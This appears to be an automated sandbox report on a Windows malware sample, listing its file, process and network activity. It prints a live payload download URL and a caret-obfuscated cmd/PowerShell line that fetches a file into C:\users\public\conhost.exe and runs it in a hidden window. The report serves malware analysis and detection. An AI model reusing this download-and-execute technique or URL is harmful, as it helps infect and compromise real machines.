Technical Information
Malicious functions
Downloads and executes
- https://softwares500.000webhostapp.com/bub.zip
Executes the following (exploit)
- '<SYSTEM32>\cmd.exe' /c P^o^w^e^r^S^h^e^l^l^ ^-^c^ ^S^e^t^-^C^o^n^t^e^n^t^ ^$^e^n^v^:^P^u^b^l^i^c^\^c^o^n^h^o^s^t^.^e^x^e^ ^-^V^a^l^u^e^ ^(^N^e^w^-^O^b^j^e^c^t^ ^S^y^s^t^e^m^.^N^e^t^.^W^e^b^C^l^i^e^n^t^)^.^D^o^w^n^...
Modifies file system
Creates the following files
- C:\users\public\conhost.exe
- %TEMP%\csc1c94ba521e6840a1b0222d15ddf818bf.tmp
- %TEMP%\wd2s13fb.out
- %TEMP%\wd2s13fb.cmdline
- %TEMP%\wd2s13fb.0.cs
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\index.dat
- %APPDATA%\microsoft\windows\cookies\low\index.dat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\z7ffl5zm\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\zzf6o3mb\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\qje6gs0p\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\oj55vfea\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %TEMP%\res4d16.tmp
- %TEMP%\wd2s13fb.dll
Sets the 'hidden' attribute to the following files
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\oj55vfea\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\qje6gs0p\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\zzf6o3mb\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\z7ffl5zm\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
Deletes the following files
- %TEMP%\res4d16.tmp
- %TEMP%\csc1c94ba521e6840a1b0222d15ddf818bf.tmp
- %TEMP%\wd2s13fb.pdb
- %TEMP%\wd2s13fb.cmdline
- %TEMP%\wd2s13fb.0.cs
- %TEMP%\wd2s13fb.out
- %TEMP%\wd2s13fb.dll
Network activity
Connects to
- 'so#######500.000webhostapp.com':443
- 'pa###bin.com':443
- 'oc##.thawte.com':80
TCP
HTTP GET requests
- http://oc##.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D
Other
- 'so#######500.000webhostapp.com':443
- 'pa###bin.com':443
UDP
- DNS ASK so#######500.000webhostapp.com
- DNS ASK pa###bin.com
- DNS ASK oc##.thawte.com
Miscellaneous
Creates and executes the following
- 'C:\users\public\conhost.exe'
- '<SYSTEM32>\cmd.exe' /c P^o^w^e^r^S^h^e^l^l^ ^-^c^ ^S^e^t^-^C^o^n^t^e^n^t^ ^$^e^n^v^:^P^u^b^l^i^c^\^c^o^n^h^o^s^t^.^e^x^e^ ^-^V^a^l^u^e^ ^(^N^e^w^-^O^b^j^e^c^t^ ^S^y^s^t^e^m^.^N^e^t^.^W^e^b^C^l^i^e^n^t^)^.^D^o^w^n^...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\wd2s13fb.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4D16.tmp" "%TEMP%\CSC1C94BA521E6840A1B0222D15DDF818BF.TMP"' (with hidden window)
Executes the following
- '<SYSTEM32>\rundll32.exe' "<SYSTEM32>\WININET.dll",DispatchAPICall 1
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\wd2s13fb.cmdline"
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4D16.tmp" "%TEMP%\CSC1C94BA521E6840A1B0222D15DDF818BF.TMP"
